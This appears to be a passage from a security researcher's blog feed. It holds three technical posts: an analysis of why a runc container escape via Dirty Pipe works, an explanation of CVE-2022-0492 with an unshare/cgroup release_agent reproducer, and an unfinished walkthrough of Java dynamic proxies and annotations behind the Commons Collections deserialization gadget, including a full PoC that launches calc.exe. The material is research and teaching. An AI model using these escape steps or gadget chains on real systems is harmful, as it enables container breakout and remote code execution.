    /*
     * Before we resort to copying, let's try creating an ro-binfd in one shot
     * by getting a handle for a read-only bind-mount of the execfd.
     */
    execfd = try_bindfd();
    if (execfd >= 0)
        return execfd;
    ...
}
</code></pre></div></div>
<p>Let's comment out the call to 'try_bindfd'. Notice: this time we comment out both 'try_bindfd' and 'sendfile', so runc uses 'fd_to_fd'.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:/home/test/go/src/runc# cp runc /usr/sbin/runc
root@ubuntu:/home/test/go/src/runc# runc --version
runc version 1.1.0+dev
commit: v1.1.0-92-g98b75bef-dirty
spec: 1.0.2-dev
go: go1.18
libseccomp: 2.5.1
root@ubuntu:/home/test/go/src/runc# md5sum /usr/sbin/runc
49f35f333efdfaf628bcd48aee611340 /usr/sbin/runc
root@ubuntu:/home/test/go/src/runc# md5sum /usr/sbin/runc
49f35f333efdfaf628bcd48aee611340 /usr/sbin/runc
root@ubuntu:/home/test/go/src/runc# runc --version
runc version 1.1.0+dev
commit: v1.1.0-92-g98b75bef-dirty
spec: 1.0.2-dev
go: go1.18
libseccomp: 2.5.1
</code></pre></div></div>
<p>OK, as we can see, the runc binary can't be modified when the deep copy is used.</p>
<p>Let's do the final experiment. This time we comment out 'try_bindfd' only, so runc uses 'sendfile'. If our guess is right, the runc binary will again be modified.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:/home/test/go/src/runc# cp runc /usr/sbin/runc
root@ubuntu:/home/test/go/src/runc# runc --version
runc version 1.1.0+dev
commit: v1.1.0-92-g98b75bef-dirty
spec: 1.0.2-dev
go: go1.18
libseccomp: 2.5.1
root@ubuntu:/home/test/go/src/runc# md5sum /usr/sbin/runc
81dd1b92fe8a80a0682b8ac117821790 /usr/sbin/runc
root@ubuntu:/home/test/go/src/runc# md5sum /usr/sbin/runc
81dd1b92fe8a80a0682b8ac117821790 /usr/sbin/runc
</code></pre></div></div>
<p>Emmm, interesting again, the runc binary hasn't been modified. Our guess was wrong.
Then I modified the dirtypipe PoC from the splice syscall to the sendfile syscall and, as expected, it didn't work. So the answer is:
the sendfile syscall doesn't share physical pages between the src file and the dst file.</p>
<h3> Conclusion </h3>
<p>After looking into the source code, I found that the 'sendfile' syscall does not in fact share physical pages between the src file and the dst file. It works as follows:</p>
<ul>
<li>splice the src file to an internally created pipe; this shares the src file's page cache with the pipe.</li>
<li>Then splice the data from the pipe to the dst file; this does an actual copy, with no sharing.</li>
</ul>
<p>This behaviour also applies to the splice syscall. That is to say, when splicing a file to a pipe the page is shared, but when splicing from a pipe to a file the data is not shared but actually copied.</p>
<p>So the function that is responsible for the container escape is 'try_bindfd', which was introduced in <a href="https://github.com/opencontainers/runc/commit/16612d74de5f84977e50a9c8ead7f0e9e13b8628">this commit</a>.
From the commit message, we learn that after introducing the <a href="https://github.com/opencontainers/runc/commit/0a8e4117e7f715d5fbeef398405813ce8e88558b">fix</a> for CVE-2019-5736, the runc community decided
to use a more efficient method to avoid the vulnerability: create a read-only bind-mount of the runc binary, obtain a handle to that bind-mount, and finally unmount it.
This way the runc binary can't be overwritten. With this method, however, /proc/self/exe still points to the runc binary on the host filesystem. Combined with dirtypipe, we can write to the actual runc binary on the host.</p>
<p>After CVE-2019-5736, most security researchers thought the fix used memfd_create to create an in-memory file and copy the runc binary into it, but this is wrong.
Because we could escape the container using dirtypipe, we assumed that sendfile shares pages between the src file and the dst file. But this is also wrong.
These two wrong assumptions cancel out and make the whole thing seem explainable, just like a negative times a negative equals a positive.
There is an old Chinese saying, "knowledge from paper is always shallow; to truly understand something you must practice it yourself" (纸上得来终觉浅,绝知此事要躬行).
The process of exploring the container escape using dirtypipe reminds me of this old saying.</p>
<p>Returning to Yuval's pictures: his exploit modifies files in the /bin directory. I'm not sure this is how Yuval escaped. If he escaped through /proc/self/exe and the shellcode then modified files in /bin, it would look like what the pictures show; if that isn't the case, there may be other interesting things going on.</p>
<h3> Reference </h3>
<p><a href="https://dirtypipe.cm4all.com/">The Dirty Pipe Vulnerability</a></p>
<p><a href="https://mp.weixin.qq.com/s/VMR_kLz1tAbHrequa2OnUA">从DirtyPipe到Docker逃逸</a></p>
CVE-2022-0492: how release_agent escape become a vulnerability 2022-03-06T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2022/03/06/cve-2022-0492
<p>The cgroup release_agent escape was a classic user mode helper escape issue several years ago. Recently it got a CVE and became popular. At first glance I didn't know why, and I had little time to dig into why it got a CVE only now. After reading <a href="https://twitter.com/yuvalavra">Yuval Avrahami</a>'s post <a href="https://unit42.paloaltonetworks.com/cve-2022-0492-cgroups/">New Linux Vulnerability CVE-2022-0492 Affecting Cgroups: Can Containers Escape</a> and discussing it with him, I found there is a lot behind CVE-2022-0492, so I decided to write a post.</p>
<h3> CVE-2022-0492 </h3>
<p>In previous release_agent escapes, we needed to add the CAP_SYS_ADMIN capability to the container. CVE-2022-0492 shows that we can mount cgroupfs in a new user namespace and then write to the release_agent file. Following is the reproducer.</p>
<p>Docker doesn't give CAP_SYS_ADMIN to the container.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:/home/test# docker run --rm -it --security-opt seccomp=unconfined --security-opt apparmor=unconfined ubuntu bash
root@26604070fc87:/# cat /proc/self/status | grep Cap
CapInh: 00000000a80425fb
CapPrm: 00000000a80425fb
CapEff: 00000000a80425fb
CapBnd: 00000000a80425fb
CapAmb: 0000000000000000
test@ubuntu:~$ capsh --decode=00000000a80425fb
WARNING: libcap needs an update (cap=40 should have a name).
0x00000000a80425fb=cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap
</code></pre></div></div>
<p>Then, in the container, we execute unshare to create a new user namespace and cgroup namespace. After that we can mount cgroupfs and write our data to release_agent.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@26604070fc87:/# unshare -UrmC bash
root@26604070fc87:/# cat /proc/self/status | grep Cap
CapInh: 0000000000000000
CapPrm: 000001ffffffffff
CapEff: 000001ffffffffff
CapBnd: 000001ffffffffff
CapAmb: 0000000000000000
root@26604070fc87:/# mount -t cgroup -o rdma cgroup /mnt
root@26604070fc87:/# ls /mnt
cgroup.clone_children cgroup.procs cgroup.sane_behavior notify_on_release release_agent tasks
root@26604070fc87:/# echo "test" > /mnt/release_agent
root@26604070fc87:/# cat /mnt/release_agent
test
</code></pre></div></div>
<h3> Why sysfs and procfs can't work </h3>
<p>The PoC is not complex, but there is a lot of detail behind it. The first question is why core_pattern and uevent_helper can't be used the same way.
Let's see whether we can mount sysfs or procfs in a new user namespace.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@26604070fc87:/# mkdir /tmp/procfs
root@26604070fc87:/# mkdir /tmp/sysfs
root@26604070fc87:/# mount -t proc procfs /tmp/procfs
mount: /tmp/procfs: permission denied.
root@26604070fc87:/# mount -t sysfs sysfs /tmp/sysfs
mount: /tmp/sysfs: permission denied.
</code></pre></div></div>
<p>As we can see, we can’t mount it.</p>
<p>The mount syscall path is as following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> SYSCALL_DEFINE5(mount)
-->do_mount
-->do_new_mount
-->mount_capable
-->vfs_get_tree
-->do_new_mount_fc
-->mount_too_revealing
-->vfs_create_mount
-->do_add_mount
</code></pre></div></div>
<p>The first permission check is in 'mount_capable'. Notice that the user namespace passed to 'ns_capable' is the fs_context's user namespace.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> bool mount_capable(struct fs_context *fc)
{
if (!(fc->fs_type->fs_flags & FS_USERNS_MOUNT))
return capable(CAP_SYS_ADMIN);
else
return ns_capable(fc->user_ns, CAP_SYS_ADMIN);
}
</code></pre></div></div>
<p>'fc->user_ns' is set in the 'init_fs_context' callback of 'struct file_system_type'. In the cgroupfs case, since we unshare the user namespace and cgroup namespace together, 'fc->user_ns' is the
new user namespace, in which we have CAP_SYS_ADMIN, so the 'mount_capable' check passes.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static int cgroup_init_fs_context(struct fs_context *fc)
{
struct cgroup_fs_context *ctx;
ctx = kzalloc(sizeof(struct cgroup_fs_context), GFP_KERNEL);
if (!ctx)
return -ENOMEM;
ctx->ns = current->nsproxy->cgroup_ns;
...
fc->user_ns = get_user_ns(ctx->ns->user_ns);
fc->global = true;
return 0;
}
</code></pre></div></div>
<p>In the procfs case, 'proc_init_fs_context' sets fc->user_ns to the pid namespace's owning user namespace.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static int proc_init_fs_context(struct fs_context *fc)
{
struct proc_fs_context *ctx;
ctx = kzalloc(sizeof(struct proc_fs_context), GFP_KERNEL);
if (!ctx)
return -ENOMEM;
ctx->pid_ns = get_pid_ns(task_active_pid_ns(current));
put_user_ns(fc->user_ns);
fc->user_ns = get_user_ns(ctx->pid_ns->user_ns);
fc->fs_private = ctx;
fc->ops = &proc_fs_context_ops;
return 0;
}
</code></pre></div></div>
<p>Since we don't create a new pid namespace, fc->user_ns is the init user namespace, in which the container has no CAP_SYS_ADMIN, so the 'mount_capable' check fails.</p>
<h3> Why 'unshare -UrmC -pf bash' can't work </h3>
<p>So what if we also unshare the pid namespace?</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@26604070fc87:/# mount -t proc procfs /mnt
mount: /mnt: permission denied.
</code></pre></div></div>
<p>We still can't mount procfs in the new user namespace and pid namespace. This time we pass the 'mount_capable' check, but we hit the second permission check of mount.</p>
<p>The second permission check is in 'mount_too_revealing'. This function is interesting.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static bool mount_too_revealing(const struct super_block *sb, int *new_mnt_flags)
{
const unsigned long required_iflags = SB_I_NOEXEC | SB_I_NODEV;
struct mnt_namespace *ns = current->nsproxy->mnt_ns;
unsigned long s_iflags;
if (ns->user_ns == &init_user_ns)
return false;
/* Can this filesystem be too revealing? */
s_iflags = sb->s_iflags;
if (!(s_iflags & SB_I_USERNS_VISIBLE))
return false;
if ((s_iflags & required_iflags) != required_iflags) {
WARN_ONCE(1, "Expected s_iflags to contain 0x%lx\n",
required_iflags);
return true;
}
return !mnt_already_visible(ns, sb, new_mnt_flags);
}
</code></pre></div></div>
<p>'mount_too_revealing' only matters in a new user namespace; as we can see, it returns 'false' when called in the init_user_ns. I guess 'revealing' conveys the idea: if the mount operation would
reveal too much data, the kernel should deny it. The first interesting part is 'SB_I_USERNS_VISIBLE'. If the super_block doesn't set this flag, the reveal check is simply bypassed. The only two filesystems that set it
are sysfs and procfs.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> if (!(s_iflags & SB_I_USERNS_VISIBLE))
return false;
</code></pre></div></div>
<p>For example, procfs sets it in 'proc_fill_super':</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static int proc_fill_super(struct super_block *s, struct fs_context *fc)
{
s->s_iflags |= SB_I_USERNS_VISIBLE | SB_I_NOEXEC | SB_I_NODEV;
}
</code></pre></div></div>
<p>So cgroupfs passes the 'mount_too_revealing' permission check, while procfs and sysfs go on to 'mnt_already_visible', where the check fails.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static bool mnt_already_visible(struct mnt_namespace *ns,
const struct super_block *sb,
int *new_mnt_flags)
{
int new_flags = *new_mnt_flags;
struct mount *mnt;
bool visible = false;
down_read(&namespace_sem);
lock_ns_list(ns);
list_for_each_entry(mnt, &ns->list, mnt_list) {
struct mount *child;
int mnt_flags;
...
list_for_each_entry(child, &mnt->mnt_mounts, mnt_child) {
struct inode *inode = child->mnt_mountpoint->d_inode;
/* Only worry about locked mounts */
if (!(child->mnt.mnt_flags & MNT_LOCKED))
continue;
/* Is the directory permanetly empty? */
if (!is_empty_dir_inode(inode))
goto next;
}
/* Preserve the locked attributes */
*new_mnt_flags |= mnt_flags & (MNT_LOCK_READONLY | \
MNT_LOCK_ATIME);
visible = true;
goto found;
next: ;
}
found:
unlock_ns_list(ns);
up_read(&namespace_sem);
return visible;
}
</code></pre></div></div>
<p>'mnt_already_visible' iterates over the mounts in the current mount namespace and checks whether each has locked child mountpoints. If it does, the filesystem is not fully visible to this mount namespace, so procfs can't be mounted.
The reason is as follows. procfs and sysfs contain some global data that the container should not be able to touch, so mounting them in a new user namespace must be restricted. Otherwise, if this were allowed,
we could mount the whole of procfs in the new user namespace. In a docker/runc environment there are 'maskedPaths', paths that should be masked in the container. For example, runc's default
maskedPaths are as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> "maskedPaths": [
"/proc/acpi",
"/proc/asound",
"/proc/kcore",
"/proc/keys",
"/proc/latency_stats",
"/proc/timer_list",
"/proc/timer_stats",
"/proc/sched_debug",
"/sys/firmware",
"/proc/scsi"
],
</code></pre></div></div>
<p>As we can see, some proc and sys files are masked in the container, which means the container has no full view of procfs and sysfs. 'maskedPaths' is implemented by mounting over these files with '/dev/null', so procfs has child mountpoints. As I don't want to figure out how to set docker's maskedPaths, let's use runc for the test. Also we'll use sysfs, since we only need to delete one line.</p>
<p>First we need to delete the rootfs readonly setting from runc's default config.json:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> "readonly": true
</code></pre></div></div>
<p>sysfs uses the network namespace's user namespace, so we need to use 'unshare -Urmn sh'.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:~/mycontainer# runc run test
/ # unshare -Urmn sh
/ # mkdir /mnt
/ # mount -t sysfs -o ro sysfs /mnt
mount: permission denied (are you root?)
</code></pre></div></div>
<p>Next we delete '/sys/firmware' from maskedPaths in config.json. Now we can mount sysfs successfully.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:~/mycontainer# runc run test
/ # unshare -Urmn sh
/ # mount -t sysfs -o ro sysfs /mnt
/ # ls /mnt
block class devices fs kernel power
bus dev firmware hypervisor module
</code></pre></div></div>
<p>I did this test successfully on 5.4.1 but it failed on 5.11; maybe there are more protections now. Here we use 'ro' because runc mounts sysfs read-only in the container.</p>
<h3> Summary </h3>
<p>Just as Yuval Avrahami points out, CVE-2022-0492 is about creating a new user &amp; cgroup namespace and then doing the release_agent escape. The kernel security mechanisms behind this CVE are quite interesting.</p>
<h3> Reference </h3>
<p>I mostly read Yuval Avrahami's post, and I thank him for pointing out the key to understanding CVE-2022-0492.</p>
<p><a href="https://unit42.paloaltonetworks.com/cve-2022-0492-cgroups/">New Linux Vulnerability CVE-2022-0492 Affecting Cgroups: Can Containers Escape?</a>
<a href="https://github.com/opencontainers/runc/issues/1658">Rootless containers don’t work from unprivileged non-root Docker container (operation not permitted for mounting procfs)</a></p>
Prelude to Java deserialization vulnerability research: Transformer, dynamic proxy and annotations2022-01-30T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2022/01/30/java-dynamic-proxy-and-annotation
<p>This year I set myself a goal of thoroughly understanding Java deserialization vulnerabilities. The principle behind deserialization vulnerabilities is not complicated, but the material online is unsatisfying: most of it just shows how to run someone else's PoC without analyzing the underlying mechanism in depth. The analyses of the Commons Collections chain are especially unsatisfying; for example, why does deserialization require a custom readObject, and why does the first argument of AnnotationInvocationHandler work with either Override.class or Target.class? In the end I decided to analyze each building block in depth myself. The main topics are dynamic proxies and annotations, but for completeness the first part covers Transformer.</p>
<h3> PoC </h3>
<p>First, here is the most basic Commons Collections PoC. The following code directly pops up a calculator.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> public static void main(String[] args) throws Exception {
Transformer[] transformers = {
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod",new Class[]{String.class, Class[].class}, new Object[]{"getRuntime",null}),
new InvokerTransformer("invoke",new Class[]{Object.class, Object[].class}, new Class[]{Runtime.class, null}),
new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc.exe"})
};
Transformer chain = new ChainedTransformer(transformers);
Map innerMap = new HashMap();
innerMap.put("value","test");
Map outerMap = TransformedMap.decorate(innerMap, null, chain);
Class cl = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
Constructor ctor = cl.getDeclaredConstructor(Class.class, Map.class);
ctor.setAccessible(true);
Object instance = ctor.newInstance(Retention.class ,outerMap);
//serialize
FileOutputStream fos = new FileOutputStream("cc1");
ObjectOutputStream oos = new ObjectOutputStream(fos);
oos.writeObject(instance);
oos.close();
//deserialize
FileInputStream fis = new FileInputStream("cc1");
ObjectInputStream ois = new ObjectInputStream(fis);
ois.readObject();
ois.close();
}
</code></pre></div></div>
<h3> Transformer </h3>
<p>Commons Collections provides a powerful interface called Transformer. As the name suggests, it implements a transformation. InvokerTransformer is especially important: it performs the transformation by invoking a specified method. Below is an example of using this Transformer.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> public class Main {
public static void main(String[] args) {
HashMap<String, String> a = new HashMap<>();
Transformer keyTrans = new InvokerTransformer("concat", new Class[]{String.class}, new Object[]{"A"});
Transformer valueTrans = new InvokerTransformer("toUpperCase", new Class[]{}, new Object[]{});
Map b = TransformedMap.decorate(a, keyTrans, valueTrans);
b.put("a", "aaa");
b.put("b", "bbb");
b.put("c", "ccc");
Iterator it = b.entrySet().iterator();
while(it.hasNext()) {
Map.Entry entry = (Map.Entry)it.next();
System.out.println("key="+entry.getKey()+",value="+entry.getValue());
}
}
}
</code></pre></div></div>
<p>The output is as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> key=cA,value=CCC
key=bA,value=BBB
key=aA,value=AAA
</code></pre></div></div>
<p>The InvokerTransformer constructor takes three arguments: the method name, the method's parameter types, and the arguments passed to that method. The first argument of TransformedMap.decorate is the map to decorate, the second is the Transformer applied to keys, and the third is the Transformer applied to values. With this setup, every element added through the decorated map (b) is transformed before being stored in the underlying map (a).</p>
<p>Let's look directly at the TransformedMap source:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> public Object put(Object key, Object value) {
key = this.transformKey(key);
value = this.transformValue(value);
return this.getMap().put(key, value);
}
protected Object transformKey(Object object) {
return this.keyTransformer == null ? object : this.keyTransformer.transform(object);
}
protected Object transformValue(Object object) {
return this.valueTransformer == null ? object : this.valueTransformer.transform(object);
}
</code></pre></div></div>
<p>Next, look at InvokerTransformer's transform implementation:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> public Object transform(Object input) {
if (input == null) {
return null;
} else {
try {
Class cls = input.getClass();
Method method = cls.getMethod(this.iMethodName, this.iParamTypes);
return method.invoke(input, this.iArgs);
} catch (NoSuchMethodException var5) {
throw new FunctorException("InvokerTransformer: The method '" + this.iMethodName + "' on '" + input.getClass() + "' does not exist");
} catch (IllegalAccessException var6) {
throw new FunctorException("InvokerTransformer: The method '" + this.iMethodName + "' on '" + input.getClass() + "' cannot be accessed");
} catch (InvocationTargetException var7) {
throw new FunctorException("InvokerTransformer: The method '" + this.iMethodName + "' on '" + input.getClass() + "' threw an exception", var7);
}
}
}
</code></pre></div></div>
<p>This code is the core of the Commons Collections gadget: it essentially invokes an arbitrary method on the type of the input argument, where iMethodName, iParamTypes and iArgs are the parameters supplied to the InvokerTransformer constructor.</p>
<p>Back to the PoC, where we use a ChainedTransformer:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> Transformer chain = new ChainedTransformer(transformers);
Map innerMap = new HashMap();
innerMap.put("value","test");
Map outerMap = TransformedMap.decorate(innerMap, null, chain);
</code></pre></div></div>
<p>ChainedTransformer's transform is implemented as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> public Object transform(Object object) {
for(int i = 0; i < this.iTransformers.length; ++i) {
object = this.iTransformers[i].transform(object);
}
return object;
}
</code></pre></div></div>
<p>In essence it calls transform on each element of iTransformers (specified when constructing the ChainedTransformer) in turn, feeding the return value of one as the argument of the next. Combined with the definition of transformers:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> Transformer[] transformers = {
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod",new Class[]{String.class, Class[].class}, new Object[]{"getRuntime",null}),
new InvokerTransformer("invoke",new Class[]{Object.class, Object[].class}, new Class[]{Runtime.class, null}),
new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc.exe"})
};
</code></pre></div></div>
<p>ConstantTransformer's transform simply returns the object given at construction. For a map decorated with these transformers, the transformation proceeds as follows:</p>
<ol>
<li>Runtime.class denotes the class Runtime; the first link in the chain just returns it.</li>
<li>Runtime.class is itself an instance of class Class, and Class has a getMethod method, so the first InvokerTransformer calls getMethod on Runtime.class with the argument "getRuntime", yielding a Method object (getRuntime).</li>
<li>The second InvokerTransformer calls invoke on the getRuntime Method, returning a Runtime object.</li>
<li>The third InvokerTransformer calls Runtime's exec with the argument "calc.exe", achieving code execution.</li>
</ol>
<p>This process is essentially equivalent to the following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> Object obj0 = Runtime.class;
Class cls1 = obj0.getClass();
Method method1 = cls1.getMethod("getMethod", new Class[]{String.class, Class[].class});
Object obj1 = method1.invoke(obj0, "getRuntime", new Class[0]);
Class cls2 = obj1.getClass();
Method method2 = cls2.getMethod("invoke", new Class[]{Object.class, Object[].class});
Object obj2 = method2.invoke( obj1, null, new Object[0]);
Class cls3 = obj2.getClass();
Method method3 = cls3.getMethod("exec", new Class[]{String.class});
Object obj3 = method3.invoke(obj2, "calc.exe");
</code></pre></div></div>
<p>Here is the debugging result:</p>
<p><img src="/assets/img/java1/1.png" alt="" /></p>
<h3> Dynamic proxy </h3>
<p>There are many dynamic proxy examples online; let's pick an <a href="https://www.jianshu.com/p/9bcac608c714">example</a> to analyze.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> interface HelloInterface {
void sayHello();
}
class Hello implements HelloInterface{
@Override
public void sayHello() {
System.out.println("Hello world!");
}
}
class ProxyHandler implements InvocationHandler {
private Object object;
public ProxyHandler(Object object){
this.object = object;
}
@Override
public Object invoke(Object proxy, Method method, Object[] args) throws Throwable {
System.out.println("Before invoke " + method.getName());
method.invoke(object, args);
System.out.println("After invoke " + method.getName());
return null;
}
}
public class Main {
public static void main(String[] args) throws Exception {
System.getProperties().setProperty("sun.misc.ProxyGenerator.saveGeneratedFiles", "true");
HelloInterface hello = new Hello();
InvocationHandler handler = new ProxyHandler(hello);
HelloInterface proxyHello = (HelloInterface) Proxy.newProxyInstance(hello.getClass().getClassLoader(), hello.getClass().getInterfaces(), handler);
proxyHello.sayHello();
System.out.println(proxyHello);
}
}
</code></pre></div></div>
<p>The output is as follows. Every method called through the proxyHello object goes through our ProxyHandler.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> Before invoke sayHello
Hello world!
After invoke sayHello
Before invoke toString
After invoke toString
null
</code></pre></div></div>
<p>Debugging shows that proxyHello is in fact an object of type $Proxy0 that implements HelloInterface; $Proxy0 is generated internally.</p>
<p><img src="/assets/img/java1/2.png" alt="" /></p>
<p>Finding the generated file in the directory, its content is as follows. The auto-generated proxy class implements HelloInterface; its methods include HelloInterface's sayHello as well as several basic Object methods, and each of them just calls super.h.invoke, which is the method the proxy handler (here ProxyHandler) must implement.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> public final class $Proxy0 extends Proxy implements HelloInterface {
private static Method m3;
private static Method m1;
private static Method m0;
private static Method m2;
public $Proxy0(InvocationHandler var1) throws {
super(var1);
}
public final void sayHello() throws {
try {
super.h.invoke(this, m3, (Object[])null);
} catch (RuntimeException | Error var2) {
throw var2;
} catch (Throwable var3) {
throw new UndeclaredThrowableException(var3);
}
}
public final boolean equals(Object var1) throws {
try {
return (Boolean)super.h.invoke(this, m1, new Object[]{var1});
} catch (RuntimeException | Error var3) {
throw var3;
} catch (Throwable var4) {
throw new UndeclaredThrowableException(var4);
}
}
public final int hashCode() throws {
try {
return (Integer)super.h.invoke(this, m0, (Object[])null);
} catch (RuntimeException | Error var2) {
throw var2;
} catch (Throwable var3) {
throw new UndeclaredThrowableException(var3);
}
}
public final String toString() throws {
try {
return (String)super.h.invoke(this, m2, (Object[])null);
} catch (RuntimeException | Error var2) {
throw var2;
} catch (Throwable var3) {
throw new UndeclaredThrowableException(var3);
}
}
static {
try {
m3 = Class.forName("test.com.company.HelloInterface").getMethod("sayHello");
m1 = Class.forName("java.lang.Object").getMethod("equals", Class.forName("java.lang.Object"));
m0 = Class.forName("java.lang.Object").getMethod("hashCode");
m2 = Class.forName("java.lang.Object").getMethod("toString");
} catch (NoSuchMethodException var2) {
throw new NoSuchMethodError(var2.getMessage());
} catch (ClassNotFoundException var3) {
throw new NoClassDefFoundError(var3.getMessage());
}
}
}
</code></pre></div></div>
<p>Back to this line in the example:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> (HelloInterface) Proxy.newProxyInstance(hello.getClass().getClassLoader(), hello.getClass().getInterfaces(), handler);
</code></pre></div></div>
<p>Look at newProxyInstance's arguments: the first is a class loader, the second is the interfaces, and the third is the handler. The proxy is in fact bound to the interface and has nothing to do with the concrete implementation Hello. So our example can be simplified as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> interface HelloInterface {
void sayHello();
}
class ProxyHandler implements InvocationHandler {
@Override
public Object invoke(Object proxy, Method method, Object[] args) throws Throwable {
System.out.println("Before invoke " + method.getName());
System.out.println(method.getName()+" is called");
System.out.println("After invoke " + method.getName());
return "test";
}
}
public class Main {
public static void main(String[] args) throws Exception {
System.getProperties().setProperty("sun.misc.ProxyGenerator.saveGeneratedFiles", "true");
InvocationHandler handler = new ProxyHandler();
HelloInterface proxyHello = (HelloInterface) Proxy.newProxyInstance(HelloInterface.class.getClassLoader(), new Class[]{HelloInterface.class}, handler);
proxyHello.sayHello();
System.out.println(proxyHello);
}
}
</code></pre></div></div>
<p>The output is as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> Before invoke sayHello
sayHello is called
After invoke sayHello
Before invoke toString
toString is called
After invoke toString
test
</code></pre></div></div>
<p>Looking at the generated $Proxy0.class again, its content is the same. So in essence, Proxy generates a class for the interface to be proxied and returns an object of it; when the user calls the interface methods on that object, the calls end up in the user-specified handler.</p>
<h3> Java annotation implementation </h3>
<p>We study Java annotations in order to understand how AnnotationInvocationHandler is used in the Commons Collections gadget.
Java annotations are code-level comments. They are "comments" because an annotation does not by itself change the runtime behavior of the annotated code, and they are "code-level" because annotations do generate code: they can be retrieved at runtime to do checks and validation, for example during Java compilation. Annotations fall into ordinary annotations and meta-annotations. Ordinary annotations such as @Override and @Deprecated are applied to code; meta-annotations such as @Retention and @Target are applied to user-defined annotations. In the code below we define two annotations, one for classes and one for methods, and the custom Person class uses both.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> @Retention(RetentionPolicy.RUNTIME)
@Target(ElementType.TYPE)
@interface AnnType {
String msg() default "type";
}
@Retention(RetentionPolicy.RUNTIME)
@Target(ElementType.METHOD)
@interface AnnMethod {
String msg() default "method";
}
@AnnType(msg="xaa")
class Person {
String name;
int age;
public Person() {
name = "aa";
age = 12;
}
public void print() {
System.out.println(name);
}
@AnnMethod
public String to_string() {
return "Person{" +
"name='" + name + '\'' +
'}';
}
}
public class Main {
public static void main(String[] args) throws Exception {
System.setProperty("sun.misc.ProxyGenerator.saveGeneratedFiles", "true");
System.out.println(new Person().to_string());
}
}
</code></pre></div></div>
<p>The output is as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> Person{name='aa'}
</code></pre></div></div>
<p>As we can see, the annotations do not affect the code's behavior.</p>
<h4> Every annotation is implemented as an interface </h4>
<p>The following code shows this:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> Class<?> annTypecls = AnnType.class;
Class<?>[] panntype = annTypecls.getInterfaces();
</code></pre></div></div>
<p><img src="/assets/img/java1/3.png" alt="" /></p>
<h4> Using annotations </h4>
<p>Let's see how annotations are used:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> AnnType annType = Person.class.getAnnotation(AnnType.class);
String annTypeValue = annType.msg();
AnnMethod annMethod = Person.class.getMethod("to_string", new Class[0]).getAnnotation(AnnMethod.class);
String annMethodValue = annMethod.msg();
System.out.println("annTypevalue = " + annTypeValue+", annMethodValue = " + annMethodValue);
</code></pre></div></div>
<p>Output:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> annTypevalue = xaa, annMethodValue = method
</code></pre></div></div>
<p>Comparing with the example code, the class annotation carries the value xaa that we specified, and the method annotation carries the default value method. We already know an annotation is an interface, so Class/Method.getAnnotation must return an instance of a class implementing that interface. Debugging shows that getAnnotation returns a proxy object: this is the dynamic proxy discussed in the previous section, and its handler is AnnotationInvocationHandler.</p>
<p><img src="/assets/img/java1/4.png" alt="" /></p>
<h4> Annotation implementation </h4>
<p>In this section we follow</p>
